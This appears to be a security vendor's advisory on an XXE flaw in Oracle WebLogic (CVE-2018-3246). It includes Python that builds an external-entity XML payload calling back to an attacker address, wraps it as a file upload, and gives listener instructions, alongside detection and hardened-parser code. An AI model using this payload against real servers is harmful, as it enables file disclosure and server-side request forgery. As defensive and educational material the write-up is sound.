Oracle WebLogic Server XML External Entity Vulnerability (CVE-2018-3246)

Oracle has addressed several WebLogic Server vulnerabilities in this quarter's Critical Patch Update. In this post we will discuss one of the notable ones, CVE-2018-3246. It is an XML External Entity (XXE) vulnerability that affects several supported Oracle WebLogic Server releases.

Vulnerability Analysis:

The vulnerability lies in a component that accepts user-uploaded configuration files in XML format. The component parses the upload with external entity resolution enabled, so a DOCTYPE declared in the uploaded file is honoured. The server also returns an error when the submitted XML is malformed, which is a useful signal while probing the endpoint.

Malformed Request

Let's create a simple file upload form and submit the request to the WebLogic server:


Let's capture this request in Burp Suite and replace the uploaded file with an XML document whose DOCTYPE declares an external entity pointing at our host. The server response confirms that it indeed tried to connect to the attacking IP over port 443:

and we now have a connection from the WebLogic server on our attacking IP:
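The upload-and-callback exchange above, as an added Python example that is not code from the original post or from Oracle: it builds the external-entity payload, wraps it as a multipart upload, shows what an entity-resolving parser would do with it (without performing any network fetch), and contrasts a parser that refuses any DOCTYPE, which is the usual fix for this class of bug. The form field name, the root element and entity names, and the callback host are assumptions.

```python
"""XXE probe and parser check for an XML file-upload endpoint.

Added example, not the original post's code. The form field name ("configFile"),
the root element ("config"), the entity name ("xxe") and the callback host are
hypothetical; substitute the real upload endpoint's values.
"""
from xml.parsers import expat


def build_xxe_payload(callback_host: str, port: int = 443) -> bytes:
    """Build a configuration document whose DOCTYPE declares an external entity.

    A parser that resolves external entities opens a connection to
    callback_host:port while expanding &xxe;, which is the out-of-band signal
    seen in the post.
    """
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        "<!DOCTYPE config [\n"
        f'  <!ENTITY xxe SYSTEM "https://{callback_host}:{port}/xxe">\n'
        "]>\n"
        "<config><setting>&xxe;</setting></config>\n"
    ).encode("utf-8")


def build_multipart_upload(field: str, filename: str, content: bytes,
                           boundary: str = "----xxe-demo-boundary") -> tuple[bytes, str]:
    """Wrap the payload in a multipart/form-data body, as a browser upload would.

    Returns (body, value for the Content-Type request header).
    """
    head = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
        "Content-Type: text/xml\r\n\r\n"
    ).encode("utf-8")
    tail = f"\r\n--{boundary}--\r\n".encode("utf-8")
    return head + content + tail, f"multipart/form-data; boundary={boundary}"


def inspect_xml(xml_bytes: bytes) -> dict:
    """Parse with expat and record what an entity-resolving parser would have done.

    External entity references are logged but never fetched: the handler
    returns 1, which tells expat to continue without resolving the entity.
    """
    report = {"doctype": None, "entities": [], "external_refs": [], "elements": []}
    parser = expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        report["doctype"] = name

    def on_entity_decl(name, is_param, value, base, system_id, public_id, notation):
        # value is None for external entities; system_id holds the URI to fetch.
        report["entities"].append((name, system_id))

    def on_external_ref(context, base, system_id, public_id):
        report["external_refs"].append(system_id)
        return 1  # non-zero: skip the fetch and keep parsing

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    parser.StartElementHandler = lambda name, attrs: report["elements"].append(name)
    parser.Parse(xml_bytes, True)
    return report


def parse_hardened(xml_bytes: bytes) -> list:
    """Hardened parse: refuse any DOCTYPE, so no entity can be declared at all.

    Same policy as the disallow-doctype-decl feature of the Java XML parsers
    that WebLogic is built on. Returns the element names in document order.
    """
    elements = []
    parser = expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # Raising inside the handler aborts the parse immediately.
        raise ValueError(f"rejected upload: DOCTYPE <{name}> is not allowed")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.StartElementHandler = lambda name, attrs: elements.append(name)
    parser.Parse(xml_bytes, True)
    return elements


if __name__ == "__main__":
    payload = build_xxe_payload("203.0.113.5")  # TEST-NET address, constructed
    body, ctype = build_multipart_upload("configFile", "config.xml", payload)
    print(ctype, len(body), "bytes")
    print("entity-resolving parser would:", inspect_xml(payload))
    try:
        parse_hardened(payload)
    except ValueError as err:
        print("hardened parser:", err)
```

Start a listener on port 443 of `callback_host` before sending the request; the connection the post shows arriving on the attacking IP is the parser's fetch of the entity's SYSTEM URI. The `inspect_xml` report, run on uploads at the boundary, doubles as a cheap detection for this kind of payload: any DOCTYPE or external entity in a configuration upload is a finding.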


An unauthenticated remote attacker who can reach the affected component could use this XXE to disclose files from the server or to make the server open connections on the attacker's behalf, as the callback above shows. Customers are advised to scan their network for QID#87368 and QID#371264 to find vulnerable WebLogic Servers and apply the appropriate patches.
